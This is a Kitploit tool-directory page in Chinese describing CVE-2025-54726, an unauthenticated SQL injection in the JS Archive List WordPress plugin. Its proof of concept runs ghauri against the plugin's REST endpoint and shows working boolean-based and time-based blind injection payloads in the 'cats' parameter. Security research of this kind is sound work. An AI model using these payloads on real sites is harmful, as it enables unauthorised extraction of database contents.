Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-54726 — JS Archive List <= 6.1.5 - 未认证的SQL注入 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2025-54726
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubrandomrobbiebf/cve-2025-54726

CVE-2025-54726

JS Archive List <= 6.1.5 - 未认证的SQL注入

查看仓库
11个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-54726

JS Archive List <= 6.1.5 - 未认证 SQL 注入

描述

JS Archive List WordPress 插件在所有版本(包括 6.1.5)中均存在 SQL 注入漏洞,原因是用户提供的参数转义不足,且对现有 SQL 查询缺乏充分的预处理准备。这使得未认证攻击者能够将额外的 SQL 查询附加到已有查询中,从而从数据库中提取敏感信息。

详情

  • 类型: 插件
  • Slug: jquery-archive-list-widget
  • 受影响版本: 6.1.5
  • CVSS 分数: 7.5
  • CVSS 评级: 高
  • CVSS 向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2025-54726
  • 状态: 活跃

POC

root@kitploit:~
ghauri  -u "http://localhost/wp-json/jalw/v1/archive?cats=1&exclusionType=exclude"


  ________.__                        .__  {1.4.1}
 /  _____/|  |__ _____   __ _________|__|
/   \  ___|  |  \\__  \ |  |  \_  __ \  |
\    \_\  \   Y  \/ __ \|  |  /|  | \/  |
 \______  /___|  (____  /____/ |__|  |__|
        \/     \/     \/         https://github.com/r0oth3x49
                                 An advanced SQL injection detection & exploitation tool.



[*] starting @ 16:39:05 /2025-09-25/

[16:39:05] [INFO] testing connection to the target URL
Ghauri resumed the following injection point(s) from stored session:
---
Parameter: cats (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cats=1 AND 01609=1609&exclusionType=exclude

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (IF - comment)
    Payload: cats=if(now()=sysdate(),SLEEP(5),0)&exclusionType=exclude
---
[16:39:05] [INFO] testing MySQL
[16:39:05] [INFO] confirming MySQL
[16:39:06] [INFO] the back-end DBMS is MySQL

下载工具